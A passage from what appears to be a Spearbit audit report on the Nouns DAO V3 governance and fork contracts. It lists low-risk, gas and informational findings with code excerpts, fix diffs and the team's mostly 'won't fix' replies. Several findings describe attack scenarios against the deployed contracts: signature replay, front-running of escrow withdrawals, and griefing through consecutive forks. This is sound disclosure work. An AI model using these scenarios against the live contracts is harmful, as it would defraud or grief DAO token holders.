being inherited. The contracts you mentioned, NounsDAOExecutorV2, NounsAuctionHouseFork, NounsDAOLogicV1Fork and NounsTokenFork are not being inherited. Unless there's a larger reason, won't fix Spearbit: Acknowledged. 39 +5.3.14 The version string is missing from the domain separator allowing submission of signatures in different protocol versions Severity: Low Risk Context: NounsDAOV3Votes.sol#L164-L167, NounsDAOV3Proposals.sol#L981-L983, NounsDAOLogicV1Fork.sol#L560- L562, ERC721CheckpointableUpgradeable.sol#L146 Description: The version string seems to be missing from the domain separator. According to EIP-712: Protocol designers only need to include the fields that make sense for their signing domain. Unused fields are left out of the struct type While it's not a mandatory field as per the EIP-712 standard, it would be sensible for the protocol to include the version string in the domain separator, considering that the contracts are upgradable. For instance, if a user generates a signature for version v1.0, they may not want the signature to remain valid following an upgrade. Recommendation: It is recommended to also include the version string in the domain separator. Nouns: Due to very low risk and non trivial fix required, we will not fix this for now. Spearbit: Acknowledged. +5.3.15 Two/three forks in a row will force expiration of execution-awaiting proposals Severity: Low Risk Context: torV2.sol#L80 ProposeDAOV3UpgradeMainnet.s.sol#L15 NounsDAOV3Admin.sol#L133 NounsDAOExecu- Description: Proposal execution on the original DAO is disallowed during the forking period. While the proposed fork period is currently 7 days, MAX_FORK_PERIOD is 14 days. GRACE_PERIOD, which is the time allowed for a queued proposal to execute, has been increased from the existing 14 days to 21 days specifically to account for the fork period. However, if there are three consecutive forks whose active fork periods add up to 21 days, or two forks in the worse case if the fork period is set to MAX_FORK_PERIOD then all queued proposals will expire and cannot be executed. Malicious griefing forkers can collude to time and break-up their voting power to fork consecutively to prevent execution of queued proposal on the original DAO, thus forcing them to expire. Recommendation: Consider introducing a short delay, e.g. 2-3 days, between the end of a fork and start of the next one. This will allow execution of queued proposals during this fork delay period without forcing their expiration. Nouns: In order to perform such a griefing attack, given a threshold of 20% to fork, the attacker would need to have 36% (20% + 16%) of nouns to do 2 forks in a row, or 48% to do 3 forks in a row. This seems highly unlikely, therefore we won't be implementing a fix for this. Spearbit: Acknowledged. 40 +5.3.16 Withdrawing from fork escrow can be front-run to prevent withdrawal and force join the fork Severity: Low Risk Context: NounsDAOV3Fork.sol#L93C74-L100 NounsDAOV3Fork.sol#L109-L130 Description: withdrawFromForkEscrow() is meant to allow a fork escrowed holder change their mind about join- ing the fork by withdrawing their escrowed tokens. However, the current design allows another fork joining holder to front-run a withdrawFromForkEscrow() transaction with their escrowToFork() to exceed the fork threshold and also call executeFork() with it (if the threshold was already met then this doesn't even have to be another fork joining holder). This will cause withdrawFromForkEscrow() to fail because the fork period is now active and that holder is forced to join the fork with their previously escrowed tokens. Scenario: Alice and Bob decide to create/join a fork with their 10 & 15 tokens respectively to meet the 20% fork threshold (assume 100 Nouns). Alice escrows first but then changes her mind and calls withdrawFromForkE- scrow(). Bob observes this transaction (assume no private mempool) and front-runs it with his escrowToFork() + executeFork(). This forces Alice to join the fork instead of staying back. withdrawFromForkEscrow() does not always succeed and is likely effective only in the early stages of escrow period but not towards the end when the fork threshold is almost met. Late fork escrowers do not have as much an opportunity as others to change their mind about joining the fork. Recommendation: Front-running is always possible in such protocols and the standard mitigation is to use MEV protections for sensitive actions. Consider a fork execution delay of 1-2 days which is enforced after reaching the threshold but before executing the fork, so that escrowed participants can evaluate their decision to join the fork one last time. Nouns: We don't think this is an issue. Escrowing your Noun to fork comes with the knowledge that it may fork. We don't need a "risk free" escrowing. Won't fix Spearbit: Acknowledged. +5.3.17 A malicious proposer can replay signatures to create duplicate proposals Severity: Low Risk Context: NounsDAOV3Proposals.sol#L844-L851 Description: Suppose Bob and Alice sign a proposal for Carl, authorizing a transfer of exactly 100,000 USDC to a specified address (xyz) and their signatures were created with a long expiration time. Following the normal procedure, Carl creates the proposal, the vote is held, and the proposal enters the 'succeeded' state. However, since Bob and Alice's signatures are still valid due to the long expiration time, Carl could reuse these signatures to create another proposal for an additional transfer of 100,000 USDC to the same xyz address, as long as Bob and Alice still retain their voting power/nouns. Thus, Carl could double the intended transfer amount without their explicit authorization. While it is true that Bob and Alice can intervene by either cancelling the new proposal or invalidating their signatures before the creation of the second proposal, it necessitates them to take action, which may not always be feasible or timely. Recommendation: Consider adding a nonce as part of these signatures and invalidate the nonce once is used. Nouns: Adding a nonce system is too big of a change. We consider this issue to be very low risk, hence won't fix Spearbit: Acknowledged. 41 +5.3.18 Potential re-minting of previously burnt NounsTokenFork Severity: Low Risk Context: NounsTokenFork.sol#L142-L157, NounsDAOForkEscrow.sol#L168-L176 Description: In the current implementation of the NounsTokenFork contract, there is a potential vulnerability that allows for a previously burned NounsTokenFork to be re-minted. This risk occurs due to the user retaining the status of escrow.ownerOfEscrowedToken(forkId, nounId) even after the claimFromEscrow() function call. Presently, no tokens are burned outside of the NounsAuctionHouseFork and are only burned in the case that no bids are placed for that nounId. However, this issue could become exploitable under the following circumstances: 1. If a new burn() functionality is added elsewhere in the code. 2. If a new contract is granted the Minter role. 3. If the NounsAuctionHouseFork is updated to a malicious implementation. Additionally, exploiting this potential issue would lead to the remainingTokensToClaim variable decreasing, caus- ing it to underflow (<0). In this situation, some legitimate users would be unable to claim their tokens due to this underflow. Recommendation: Consider updating the escrowedTokensByForkId[forkId_][tokenId] mapping in the Nouns- DAOForkEscrow contract every time claimFromEscrow() is called. Nouns: Since there is no way to currently get the Noun burned without changing minter/contracts, we choose not to introduce new logic for fixing this. If the forked DAO chooses to enable burning, they could update the token contract and change the claimFromEscrow() logic. Spearbit: Acknowledged. +5.3.19 A single invalid/expired/cancelled signature will prevent the creation and updation of proposals Severity: Low Risk NounsDAOV3Proposals.sol#L956-L962 Context: DAOV3Proposals.sol#L401 Description: For proposals created via proposeBySigs() or updated via updateProposalBySigs(), if the pro- poser includes even a single invalid/expired/cancelled signature (without performing offchain checks to prevent this scenario), verifyProposalSignature() will revert and the creation/updation of proposals will fail. NounsDAOV3Proposals.sol#L815 Nouns- A proposer accidentally including one or more invalid/expired/cancelled signatures submitted accidentally by a signer will cause the proposal creation/updation to fail, lose gas used and will have to resubmit after checking and excluding such signatures. This also allows griefing by signers who intentionally submit an invalid/expired signature or a valid one which is later cancelled (using cancelSig()) just before the proposal is created/updated. Note that while the signers currently have cancellation powers which gives them a greater griefing opportunity even at later proposal states, that has been reported separately in a different issue. Recommendation: 1. Consider having verifyProposalSignature() return a status code (invalid/expired/cancelled) which is then used to skip the consideration of such signatures. The voting power of other signatures may still add up to being sufficient for the proposal to be created or updated. 2. Consider checking that voting power of valid signatures during updation exceeds threshold instead of requir- ing the exact ordered list of original signers. The updation signers may be a subset of the original signers but still pass the proposal threshold to indicate support for updation. Nouns: Acknowledged, but due to low risk, won't fix. Spearbit: Acknowledged. 42 +5.3.20 Missing require checks in NounsDAOV3Proposals.execute() and executeOnTimelockV1() functions Severity: Low Risk Context: NounsDAOV3Proposals.sol#L470, NounsDAOV3Proposals.sol#L481 Description: The following require checks are missing: • FunctionNounsDAOV3Proposals.execute(): require(proposal.executeOnTimelockV1 == false, 'NounsDAO::execute: executeOnTimelockV1 = true'); • Function NounsDAOV3Proposals.executeOnTimelockV1(): require(proposal.executeOnTimelockV1 == true, 'NounsDAO::executeOnTimelockV1: executeOnTimelockV1 = ,! false'); Due to the absence of these require checks, the NounsDAOLogicV3 contract leaves open a vulnerability where if two identical proposals, with the exact same transactions, are concurrently queued in both the timelockV1 and timelock contracts, the proposal originally intended for execution on timelock can be executed on timelockV1 and vice versa. The consequence of this scenario is that it essentially blocks or causes a Denial of Service to the legitimate execution path of the corresponding proposal for either timelockV1 or timelock. This occurs because each proposal has been inadvertently executed on the unintended timelock contract due to the lack of a condition check that would otherwise ensure the correct execution path. Recommendation: Consider adding a require that checks the executeOnTimelockV1 flag in both functions. Nouns: The risk presented is very unlikely. Hence, leaving as is, won't fix. Spearbit: Acknowledged. +5.3.21 Due to misaligned DAO and Executors logic any proposal will be blocked from execution at 'eta + GRACE_PERIOD' timestamp Severity: Low Risk Context: NounsDAOLogicV2.sol#L455-L473, NounsDAOV3Proposals.sol#L625-L652, NounsDAOLogicV1Fork.sol#L477- L493 Description: There is an inconsistency in treatment of the eta + GRACE_PERIOD moment of time in the proposal lifecycle: any proposal is executable in timelock at this timestamp, but have expired status in the DAO logic. Both Executors do allow the executions when block.timestamp == eta + GRACE_PERIOD: The NounsDAOExecutor:executeTransaction() function: 43 function executeTransaction( address target, uint256 value, string memory signature, bytes memory data, uint256 eta ) public returns (bytes memory) { ... require( getBlockTimestamp() >= eta, "NounsDAOExecutor::executeTransaction: Transaction hasn't surpassed time lock." ); require( getBlockTimestamp() <= eta + GRACE_PERIOD, 'NounsDAOExecutor::executeTransaction: Transaction is stale.' ); The NounsDAOExecutorV2:executeTransaction() function: function executeTransaction( address target, uint256 value, string memory signature, bytes memory data, uint256 eta ) public returns (bytes memory) { ... require( getBlockTimestamp() >= eta, "NounsDAOExecutor::executeTransaction: Transaction hasn't surpassed time lock." ); require( getBlockTimestamp() <= eta + GRACE_PERIOD, 'NounsDAOExecutor::executeTransaction: Transaction is stale.' ); While all (V1,2, 3, and V1Fork) DAO state functions produce the expired state. The NounsDAOLogicV2:state() function: function state(uint256 proposalId) public view returns (ProposalState) { require(proposalCount >= proposalId, 'NounsDAO::state: invalid proposal id'); Proposal storage proposal = _proposals[proposalId]; if (proposal.vetoed) { return ProposalState.Vetoed; } else if (proposal.canceled) { return ProposalState.Canceled; } else if (block.number <= proposal.startBlock) { return ProposalState.Pending; } else if (block.number <= proposal.endBlock) { return ProposalState.Active; } else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < ,! quorumVotes(proposal.id)) { return ProposalState.Defeated; } else if (proposal.eta == 0) { return ProposalState.Succeeded; } else if (proposal.executed) { return ProposalState.Executed; >> } else if (block.timestamp >= proposal.eta + timelock.GRACE_PERIOD()) { return ProposalState.Expired; 44 The NounsDAOV3Proposals:stateInternal() function: function stateInternal(NounsDAOStorageV3.StorageV3 storage ds, uint256 proposalId) internal view returns (NounsDAOStorageV3.ProposalState) { require(ds.proposalCount >= proposalId, 'NounsDAO::state: invalid proposal id'); NounsDAOStorageV3.Proposal storage proposal = ds._proposals[proposalId]; if (proposal.vetoed) { return NounsDAOStorageV3.ProposalState.Vetoed; } else if (proposal.canceled) { return NounsDAOStorageV3.ProposalState.Canceled; } else if (block.number <= proposal.updatePeriodEndBlock) { return NounsDAOStorageV3.ProposalState.Updatable; } else if (block.number <= proposal.startBlock) { return NounsDAOStorageV3.ProposalState.Pending; } else if (block.number <= proposal.endBlock) { return NounsDAOStorageV3.ProposalState.Active; } else if (block.number <= proposal.objectionPeriodEndBlock) { return NounsDAOStorageV3.ProposalState.ObjectionPeriod; } else if (isDefeated(ds, proposal)) { return NounsDAOStorageV3.ProposalState.Defeated; } else if (proposal.eta == 0) { return NounsDAOStorageV3.ProposalState.Succeeded; } else if (proposal.executed) { return NounsDAOStorageV3.ProposalState.Executed; >> } else if (block.timestamp >= proposal.eta + getProposalTimelock(ds, proposal).GRACE_PERIOD()) { return NounsDAOStorageV3.ProposalState.Expired; The NounsDAOLogicV1Fork:state() function: function state(uint256 proposalId) public view returns (ProposalState) { require(proposalCount >= proposalId, 'NounsDAO::state: invalid proposal id'); Proposal storage proposal = _proposals[proposalId]; if (proposal.canceled) { return ProposalState.Canceled; } else if (block.number <= proposal.startBlock) { return ProposalState.Pending; } else if (block.number <= proposal.endBlock) { return ProposalState.Active; } else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < ,! proposal.quorumVotes) { return ProposalState.Defeated; } else if (proposal.eta == 0) { return ProposalState.Succeeded; } else if (proposal.executed) { return ProposalState.Executed; >> } else if (block.timestamp >= proposal.eta + timelock.GRACE_PERIOD()) { return ProposalState.Expired; Impact: Since both timelocks require sender to be admin, forced to be expired when execution call proposal).GRACE_PERIOD(). the valid proposal will be blocked from execution and time happens to be proposal.eta + getProposalTimelock(ds, The probability of this exact timestamp to be reached is low, while the impact of successful proposal to be rendered invalid by itself is high. However, since there is enough time prior to that moment both for cancellation and execution and all these actions come through permissioned workflow the impact is better described as medium, so per low probability and medium impact setting the severity to be low. 45 Recommendation: As eta timestamp is included, consider the if (block.timestamp > proposal.eta + GRACE_PERIOD) then {return Expired;} kind of logic in all state functions: At NounsDAOLogicV2:state(): function state(uint256 proposalId) public view returns (ProposalState) { ... return ProposalState.Executed; - + } else if (block.timestamp >= proposal.eta + timelock.GRACE_PERIOD()) { } else if (block.timestamp > proposal.eta + timelock.GRACE_PERIOD()) { return ProposalState.Expired; At NounsDAOV3Proposals:stateInternal(): function stateInternal(NounsDAOStorageV3.StorageV3 storage ds, uint256 proposalId) internal view returns (NounsDAOStorageV3.ProposalState) { ... return NounsDAOStorageV3.ProposalState.Executed; - + } else if (block.timestamp >= proposal.eta + getProposalTimelock(ds, proposal).GRACE_PERIOD()) { } else if (block.timestamp > proposal.eta + getProposalTimelock(ds, proposal).GRACE_PERIOD()) { return NounsDAOStorageV3.ProposalState.Expired; At NounsDAOLogicV1Fork:state(): function state(uint256 proposalId) public view returns (ProposalState) { ... return ProposalState.Executed; - + } else if (block.timestamp >= proposal.eta + timelock.GRACE_PERIOD()) { } else if (block.timestamp > proposal.eta + timelock.GRACE_PERIOD()) { return ProposalState.Expired; Nouns: We consider this issue to be very low severity since it effectively just shortens the time a proposal can be queued by 1 second. We will not fix it at this time Spearbit: In addition to that the impact also is that at eta + timelock.GRACE_PERIOD timestamp any proposal will not be cancellable, but this proposal transactions will be executable by a direct call to NounsDAOExecutorV2's executeTransaction(). Acknowledged. +5.3.22 A malicious DAO can increase the odds of proposal defeat by setting a very high value of last- MinuteWindowInBlocks Severity: Low Risk Context: NounsDAOV3Admin.sol#L219-L227 NounsDAOV3Votes.sol#L229-L257 Description: The goal of objection-only period, as documented, is to protect the DAO from executing proposals, that the majority would not want to execute. However, a malicious majority can abuse this feature by setting a very high value of lastMinuteWindowInBlocks (setter does not enforce max threshold), i.e. something very close to the voting period, to increase the probability of triggering objection-only period. If votingPeriod = 2 weeks and a governance proposal somehow passed to set lastMin- Example scenario: uteWindowInBlocks to a value very close to 100800 blocks i.e. ~2 weeks, then every proposal may end up with an objection-only period. Impact: Every proposal may end up with an objection-only period which may not be required/expected. Low likelihood + Low impact = Low severity. 46 Recommendation: Consider implementing a max threshold for lastMinuteWindowInBlocks preferably as a per- centage value, say 70%, of the votingPeriod which would make any triggering of the objection period meaningful. This is because, switching of the proposal state from defeated to successful in the initial phase of the voting period may not mean much. Nouns: We still see it s a feature to be able to set it to the entire voting period. Won't fix Spearbit: Our take here is that during initial part of the voting period this trigger is more a bug than a feature. Switching from Defeated to Successful brings in no information when voting is just started. Acknowledged. 5.4 Gas Optimization +5.4.1 Use custom errors instead of revert strings and remove pre-existing unused custom errors Severity: Gas Optimization Context: NounsDAOProxy.sol#L79, NounsDAOExecutorV2.sol#L108, NounsDAOExecutor.sol#L134, NounsDAO- LogicV1Fork.sol#L680, NounsTokenFork.sol#L43 Description: String errors are added to the bytecode which make deployment cost more expenseive. It is also difficult to use dynamic information in them. Custom errors are more convenient and gas-efficient. There are several cases across the codebase where long string errors are still used over custom errors. As an example, in NounsDAOLogicV1Fork.sol#L680, the check reverts with a string: require(msg.sender == admin, 'NounsDAO::_setQuorumVotesBPS: admin only'); In this case, the AdminOnly() custom error can be used here to save gas. This also occur in other parts of this contract as well as the codebase. Also, some custom errors were defined but not used. See NounTokenFork.sol#L40, NounTokenFork.sol#L43 Recommendation: It is worth using custom errors over string errors as this will save gas. Review and update the codebase with custom errors where convenient. Also, remove any unused custom error. Nouns: Won't Fix. We do benefit from the current design, e.g. by being able to run the same test code on multiple DAO versions. Spearbit: Acknowledged. +5.4.2 escrowedTokensByForkId can be used to get owner of escrowed tokens Severity: Gas Optimization Context: NounsDAOForkEscrow.sol#L58 Description: The state variable escrowedTokensByForkId in L58 creates a getter function that can be used to check the owner of escrowed token. This performs the same function as calling ownerOfEscrowedToken() and might be considered redundant. Recommendation: Consider removing the function ownerOfEscrowedToken() to reduce code and deployment cost. Nouns: Won't Fix. The deployment gas savings aren't important enough right now. Spearbit: Acknowledged. 47 +5.4.3 Emit events using locally assigned variables instead of reading from storage to save on SLOAD Severity: Gas Optimization Context: NounsDAOV3Admin.sol#L284, NounsDAOLogicV1Fork.sol#L619, NounsDAOExecutorV2.sol#L104, NounsDAOProxy.sol#L85 Description: By emitting local variables over storage variables, when they have the same value, you can save gas on SLOAD. Some examples include: NounsDAOLogicV1Fork.sol#L619 : - + emit VotingDelaySet(oldVotingDelay, votingDelay); emit VotingDelaySet(oldVotingDelay, newVotingDelay); NounsDAOLogicV1Fork.sol#L635 : - + emit VotingPeriodSet(oldVotingPeriod, votingPeriod); emit VotingPeriodSet(oldVotingPeriod, newVotingPeriod); NounsDAOLogicV1Fork.sol#L653 : - + emit ProposalThresholdBPSSet(oldProposalThresholdBPS, proposalThresholdBPS); emit ProposalThresholdBPSSet(oldProposalThresholdBPS, newProposalThresholdBPS); NounsDAOLogicV1Fork.sol#L670 : - emit QuorumVotesBPSSet(oldQuorumVotesBPS, quorumVotesBPS); + emit QuorumVotesBPSSet(oldQuorumVotesBPS, newQuorumVotesBPS); NounsDAOExecutorV2.sol#L104 : - + emit NewDelay(delay); emit NewDelay(delay_); NounsDAOExecutorV2.sol#L112 : - + emit NewAdmin(admin); emit NewAdmin(msg.sender); NounsDAOExecutorV2.sol#L122 : - + emit NewPendingAdmin(pendingAdmin); emit NewPendingAdmin(pendingAdmin_); NounsDAOV3Admin.sol#L284 : - + emit NewPendingAdmin(oldPendingAdmin, ds.pendingAdmin); emit NewPendingAdmin(oldPendingAdmin, address(0)); NounsDAOProxy.sol#L85 : - + emit NewImplementation(oldImplementation, implementation); emit NewImplementation(oldImplementation, implementation_); Recommendation: Review the codebase and consider using the existing local values instead of reading from storage when emitting events. This will save some gas since it will avoid usage of the SLOAD opcode. Nouns: Fix PR: nounsDAO/nouns-monorepo#736. Spearbit: Fixed. 48 5.5 Informational +5.5.1 joinFork() violates Checks-Effects-Interactions best practice for reentrancy mitigation Severity: Informational Context: NounsDAOV3Fork.sol#L139-L158 Description: joinFork() interacts with forkDAOTreasury in sendProRataTreasury() to send pro rata original DAO treasury for the tokens joining the fork. This interaction with the external forkDAOTreasury contract happens before the transfer of the original DAO tokens to the timelock is effected. While forkDAOTreasury is under the control of the fork DAO (outside the trust model of original DAO) and join- Fork() does not have a reentrancy guard, we do not see a potential/meaningful exploitable reentrancy here. Recommendation: Implement the Checks-Effects-Interactions best practice by transferring the original tokens to the timelock before sending its proportional treasury from the original DAO to the fork DAO. Nouns: Won't Fix. Risk is too low. Spearbit: Acknowledged. +5.5.2 Rename MAX_VOTING_PERIOD and MAX_VOTING_DELAY to enhance readability. Severity: Informational Context: NounsDAOV3Admin.sol#L115, NounsDAOV3Admin.sol#L121 Description: Given that the state variables MAX_VOTING_PERIOD (NounsDAOV3Admin.sol#L115) and MAX_VOT- ING_DELAY (NounsDAOV3Admin.sol#L121) are in blocks, it is more readable if the name has a _BLOCKS suffix and is set to 2 weeks / 12 as done with MAX_OBJECTION_PERIOD_BLOCKS and MAX_UPDATABLE_PERIOD_BLOCKS. The functions, _setVotingDelay (L152) and _setVotingPeriod (L167), can be renamed in the same vain by adding -InBlocks suffix similar to _setObjectionPeriodDurationInBlocks and other functions. In addition to this, constants should be named with all capital letters with underscores separating words, follow- ing the Solidity style guide. For example, proposalMaxOperations in NounsDAOV3Proposals.sol#L138 can be renamed. Recommendation: Implement changes in MAX_VOTING_PERIOD and MAX_VOTING_DELAY to enhance readability. Rename proposalMaxOperations to follow the style guide for constants. Nouns: Fixed: Ack, fix PR: PR 728 and commit 6d4388. Spearbit: Fixed. +5.5.3 External function is used instead of internal equivalent across NounsDAOV3Proposals logic Severity: Informational Context: NounsDAOV3Proposals.sol#L389 Description: Public view state(ds, proposalId) is used instead of the fully equivalent internal stateInter- nal(ds, proposalId) in the several occurrences of NounsDAOV3Proposals logic. For example, in the NounsDAOV3Proposals:updateProposalBySigs the state(ds, proposalId) is used instead of the stateInternal function: if (state(ds, proposalId) != NounsDAOStorageV3.ProposalState.Updatable) revert ,! CanOnlyEditUpdatableProposals(); 49 Recommendation: It is recommended to use stateInternal(ds, proposalId) instead of the public state(ds, proposalId) function. Nouns: Fix PR: nounsDAO/nouns-monorepo#729. Spearbit: Fix looks good. +5.5.4 Proposals created through proposeBySigs() can not be executed on TimelockV1 Severity: Informational Context: NounsDAOV3Proposals.sol#L204 Description: Currently, proposals created through the proposeBySigs() function can not be executed on Time- lockV1. This could potentially limit the flexibility of creating different types of proposals. It may be advantageous to have a parameter added to the proposeBySigs() function, allowing the proposer to decide whether the proposal should be executed on TimelockV1 or not. There's a design decision to be made regarding whether this value should be incorporated as part of the signers' signature, or simply left up to the proposer to determine if execution should happen on the TimelockV1 or not. Recommendation: Consider modifying the function by adding a parameter for execution location decision. This could be part of the signer's signature or be at the proposer's discretion. Nouns: Acknowledged, won't fix. Spearbit: Acknowledged. +5.5.5 escrowToFork() can be frontrun to prevent users from joining the fork during the escrow period Severity: Informational Context: NounsDAOV3Fork.sol#L72-L86 NounsDAOV3Fork.sol#L109-L130 Description: escrowToFork() could be frontrun by another user and make it revert by either: 1. Frontrunning with another escrowToFork() that reaches the fork threshold + executeFork(). 2. If the fork threshold was already reached, frontrunning with executeFork(). This forces the escrowing user to join the fork only during the forking period. Recommendation: Consider a delay period between the escrow and forking periods so that executeFork() is a time-based trigger instead of relying only on the threshold. Nouns: Thank you, we won't fix this one. Spearbit: Acknowledged. 50 +5.5.6 Fork spec says Nouns are escrowed during the fork active period Severity: Informational Context: Fork-Spec Description: Fork-Spec says: "During the forking period additional forking Nouns are also sent to the escrow contract; the motivation is to have a clean separation between fork-related Nouns and Nouns owned by the DAO for other reasons." However, the implementation sends such Nouns to the original DAO treasury. Recommendation: Update the spec to reflect the current implementation. Nouns: Spec is updated. Spearbit: This has been updated in the latest spec commit. +5.5.7 Known issues from previous versions/audit Severity: Informational Context: Audit-Report Note Description: Below are some of the known issues from previous versions as reported by the protocol team, documented in the audit report and is being recorded here verbatim for reporting purposes. Note: All issues reported earlier and not fixed in current version(s) of audit scope are assumed to be acknowledged without fixing. NounsToken delegateBySigs allows delegating to address zero We’ve fixed this issue in the fork token contract, but cannot fix it in the original NounsToken because the contract isn’t upgradeable. Voting gas refund can be abused We’re aware of different ways of abusing this function: A token holder could delegate their Nouns to a contract and vote on multiple proposals in a loop, such that the tx gas overhead is amortized across all votes, while the refund function assumes each vote has the full overhead to bear; this could result in token holders profiting from gas refunds. A token holder could grief the DAO by voting with very long reason strings, in order to drain the refund balance faster. We find these issues low risk and unlikely given the small size of the community, and the low ETH balance the governor contract has to spend on refunds. Should we see such abusive activity, we might reconsider this feature. Nouns transfers will stop working when block number hits uint32 max value We’re aware of this issue. It means the Nouns token will stop functioning a long long long time from now :) AuctionHouse has an open gas griefing vector Bidder Alice can bid from a smart contract that returns a large byte array when receiving ETH. Then if Bob outbids Alice, in his bid tx AuctionHouse refunds Alice, and the large return value causes a gas cost spike for Bob. See more details here. We’re planning to fix this in the next AuctionHouse version, its launch date is unknown at this point. Using error strings instea of custom errors In all new code we’re using custom errors. In code that’s forked from previous versions we optimized for the smallest diff possible, and so leaving error strings untouched. Recommendation: Nouns: Acknowledged. Spearbit: Acknowledged 51 +5.5.8 When a minority forks, the majority can follow Severity: Informational Context: When a minority forks, the majority can follow Description: This is a known issue as documented by the protocol team and is being recorded here verbatim for reporting purposes. For example, a malicious majority can vote For a proposal to drain the treasury, forcing others to fork; the majority can then join the fork with many of their tokens, benefiting from the passing proposal on the original DAO, while continuing to attack the minority in their new fork DAO, forcing them to quit the fork DAO. This is a well known flaw of the current fork design, something we’ve chosen to go live with for the sake of shipping something the DAO has asked for urgently. Recommendation: Consider a redesign which mitigates this issue in a future iteration. Nouns: Acknowledged. Spearbit: Acknowledged. +5.5.9 The original DAO can temporarily brick a fork DAO’s token minting Severity: Informational Context: The-original-DAO-can-temporarily-brick-a-fork DAO's-token-minting Description: This is a known issue as documented by the protocol team and is being recorded here verbatim for reporting purposes. We’ve decided in this version to deploy fork DAOs such that fork tokens reuse the same descriptor contract as the original DAO’s token descriptor. Our motivations are minimizing lines of code and the gas cost of deploying a fork. This design poses a risk on fork tokens: the original DAO can update the descriptor to use a new art contract that always reverts, which would then lead to fork token’s mint function always reverting. The solution would be for the fork DAO to execute a proposal that deploys and sets a new descriptor to its token, which would use a valid art contract, allowing minting to resume. The fork DAO is guaranteed to be able to propose and execute such a proposal, because the function where Nouners claim their fork tokens does not use the descriptor, and so is not vulnerable to this attack. Recommendation: Ensure that the forking UI/UX provides guidance on this aspect. Nouns: Acknowledged. Spearbit: Acknowledged. 52 +5.5.10 Unused events, missing events and unindexed event parameters in contracts Severity: Informational Context: INounsTokenFork.sol#L29, NounsDAOV3Admin.sol#L509-514, NounsDAOEventsFork.sol#L43 Description: Some contracts have missing or unused events, as well as event parameters that are unindexed. As an examples: 1. Unused events: INounsTokenFork.sol#L29: event NoundersDAOUpdated(address noundersDAO); 2. Missing events: NounsDAOV3Admin.sol#L509-514: Missing event like in _setForkEscrow 3. Unindexed parameters: NounsDAOEventsFork.sol: Many parameters can be indexed here Recommendation: Review the codebase, remove unused events, add missing events and index event parameters where necessary Nouns: Fix PR: nounsDAO/nouns-monorepo#730. Spearbit: Fixed. +5.5.11 Prefer using __Ownable_init instead of _transferOwnership to initialize upgradable contracts Severity: Informational Context: NounsAuctionHouseFork.sol#L87, NounsTokenFork.sol#L129 Description: The upgradable NounsAuctionHouseFork and the NounsTokenFork contracts inherit the OwnableUp- gradeable contract. However, inside the initialize function the ownership transfer is performed by calling the internal _transferOwnership function instead of calling the __Ownable_init. This deviates from the standard ap- proach of initializing upgradable contracts, and it can lead to issues if the OwnableUpgradeable contract changes its initialization mechanism. Recommendation: It is recommended to use the __Ownable_init function instead of _transferOwnership to initialize the mentioned contracts. Nouns: Won't Fix. We're still using an older OZ version without the ability to set a custom owner in the init function. Upgrading our OZ version is out of scope in this release. Spearbit: Acknowledged. +5.5.12 Consider emitting the address of the timelock in the ProposalQueued event Severity: Informational Context: NounsDAOV3Proposals.sol#L448 Description: The queue function currently emits the ProposalQueued event to provide relevant information about the proposal, including the proposalId and the eta. However, it doesn't emit the timelock variable, which rep- resents the address of the timelock responsible for executing the proposal. This could lead to confusion among users regarding the intended timelock for proposal execution. Recommendation: To address this issue, it is recommended to include the address of the timelock in the Pro- posalQueued event as well. This improvement will enhance the clarity and usability of the emitted event. Nouns: We won't change the ProposalQueued event at this to maintain backwards compatibility with Governor Bravo clients. We'll use the event ProposalCreatedOnTimelockV1 for this purpose during creation time. Spearbit: Acknowledged. 53 +5.5.13 Use IERC20Upgradeable/IERC721Upgradeable for consistency with other contracts Severity: Informational Context: NounsAuctionHouseFork.sol#L35, NounsDAOLogicV1Fork.sol#L102, NounsTokenFork.sol#L25 Description: Most contracts/libraries imported and used are the upgradeable variant e.g. OwnableUpgradeable. IERC20 and IERC721 are used which is inconsistent with the other contracts/libraries. Since the project is deployed with upgradeability featured, it is more preferable to use the Upgradeable variant of OpenZeppelin Contracts. Recommendation: Use the IERC20Upgradeable or IERC721Upgradeable version where applicable in the code- base to be consistent with other upgradeable contracts/libraries. Nouns: Won't Fix. Spearbit: Acknowledged. +5.5.14 Specification says "Pending" state instead of "Updatable" Severity: Informational Context: nouns-dao-v3-spec Description: The V3 spec says the following for "Proposal editing": "The proposer account of a proposal in the PENDING state can call an updateProposal function, providing the new complete set of transactions to execute, as well as a complete new version of the proposal description text." This is incorrect because editing can only happen in the "Updatable" state which is just before the "Pending" state. Recommendation: Fix the specification document to say: "The proposer account of a proposal in the UPDATABLE state can call an updateProposal function...". Consider adding more details in the specification corresponding to what's been implemented. Nouns: Fixed. Spearbit: Verified that the spec has been updated as per recommendation. +5.5.15 Typos, comments and descriptions need to be updated Severity: Informational Context: NounsDAOExecutorProxy.sol#L24, NounsTokenFork.sol#L66, DAOV3DynamicQuorum.sol#L124, NounsDAOStorageV1Fork.sol#L33, NounsDAOLogicV3.sol#L902 NounsDAOLogicV1Fork.sol#L48, NounsDAOLogicV1Fork.sol#L80, NounsDAOV3Votes.sol#L267, Nouns- NounsDAOV3Admin.sol#L130, Description: comments/descriptions. The contract Typos: source code contains several typographical errors and misaligned 1. NounsDAOLogicV1Fork.sol#L48: adjutedTotalSupply should be adjustedTotalSupply 2. NounsDAOLogicV1Fork.sol#L80: veteor shoud be vetoer 3. NounsDAOV3Votes.sol#L267: objetion should be objection 4. NounsDAOExecutorProxy.sol#L24: imlemenation should be implementation Comment Discrepancies: 1. NounsDAOV3Admin.sol#L130: Should say // 6,000 basis points or 60% and not 4,000 2. NounsDAOV3Votes.sol#L219: change string 'NounsDAO::castVoteInternal: voter already voted' to 'NounsDAO::castVoteDuringVotingPeriodInternal: voter already voted' 54 3. NounsDAOExecutorV2.sol#L209: change string 'NounsDAOExecutor::executeTransaction: Call must come from admin. to 'NounsDAOExecutor::sendETH: Call must come from admin. 4. NounsDAOExecutorV2.sol#L221: change string NounsDAOExecutor::executeTransaction: Call must come from admin. to NounsDAOExecutor::sendERC20: Call must come from admin. 5. NounsDAOV3DynamicQuorum.sol#L124: Should be adjusted total supply 6. NounsDAOV3DynamicQuorum.sol#L135: Should be adjusted total supply 7. NounsDAOLogicV3.sol#L902: Adjusted supply is used for minQuorumVotes() 8. NounsDAOLogicV3.sol#L909: Adjusted supply is used for maxQuorumVotes() 9. NounsDAOStorageV1Fork.sol#L33: proposalThresholdBPS is required to be exceeded, say when it is zero, one noun is needed to propose 10. NounsTokenFork.sol#L66: Typo, to be after which Recommendation: It is recommended to fix the typographical errors and update the comments to align with 